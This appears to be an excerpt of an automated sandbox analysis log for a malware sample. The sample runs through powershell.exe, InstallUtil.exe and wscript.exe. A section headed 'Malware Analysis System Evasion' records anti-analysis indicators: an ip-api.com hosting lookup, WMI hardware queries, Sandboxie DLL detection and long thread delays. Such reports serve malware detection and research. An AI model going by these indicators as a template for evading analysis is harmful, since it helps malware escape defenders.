                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: powershell.exe, 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: B70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1478Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1891Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4299Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5511Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3909Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5905Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5456Thread sleep count: 4299 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep count: 5511 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5888Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep count: 3909 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99781s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99669s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99563s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99453s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99342s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep count: 5905 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99207s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98940s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98813s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98688s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98563s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98438s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98313s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98202s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97969s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97859s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97750s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97521s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97391s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97266s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97156s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97047s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -96938s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -96813s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99764s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99655s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99546s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99437s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99325s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99217s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99105s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -99000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98890s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98781s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98666s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98562s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98451s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98343s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98234s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98120s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -98015s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97904s >= -30000sJump to behavior
